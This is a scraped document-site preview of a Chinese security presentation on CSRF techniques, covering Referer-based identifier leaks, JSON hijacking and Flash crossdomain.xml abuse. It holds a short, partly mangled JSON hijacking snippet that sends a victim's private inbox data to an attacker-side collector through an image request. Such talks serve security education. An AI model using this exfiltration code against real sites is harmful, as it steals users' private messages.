- 9
- 0
- 约5.49千字
- 约 39页
- 2016-08-16 发布于河南
- 举报
CSRF-苏醒的巨人
使用服务端代理 使用服务端代理技术: asp/服务端的XMLHTTP,php的file_get_contents等等。 无法获取页面内容中的唯一标识,只能获取url中的唯一标识: 使用referer来获取目标站点的url。 r = Request.ServerVariables(“HTTP_REFERER”)。 r可能为http://目标站点/space/user/?id=2343,其中2343就是唯一标识。 使用JSON Hijacking 使用JSON Hijacking技术: 目标站点使用了JSON数据传输用户私有数据。 该私有数据内包含我们需要的唯一标识等信息。 相关代码: script function hijack(o){ //use DOM method to get your data new Image().src=/JSONHiJack.asp?hi=+escape(data); }/script script src=/private_messages/inbox.json?callback=hijackcount=2/script 使用Flash 使用Flash ActionScript脚本: 目标站点下必须存在crossdomain.xml文件。 crossdomain.xml中的配置允许其他域的AS脚本进行跨域请求。 ?xml version=1
您可能关注的文档
最近下载
- 幼儿园各岗位职责详细说明手册.docx VIP
- 公路工程勘察设计投标方案(完整技术标).docx
- 管理学第八版周三多课后答案.pdf VIP
- 2026春冀美版(2024)二年级下册小学美术每课教学反思(附目录).docx VIP
- MODBUSTCP协议解析.ppt VIP
- 人教版二年级下册数学全册新素养教学课件(配2026年春改版教材).pptx
- OT-120管弦乐调音表调音程序.PDF VIP
- AP微观经济学 2016年真题 (选择题+问答题) AP Microeconomics 2016 Released Exam and Answers (MCQ+FRQ).pdf VIP
- 四年级下学期语文阅读理解摸底专项练习题含答案.pdf VIP
- 水利工程勘察设计投标方案(技术标).doc
原创力文档

文档评论(0)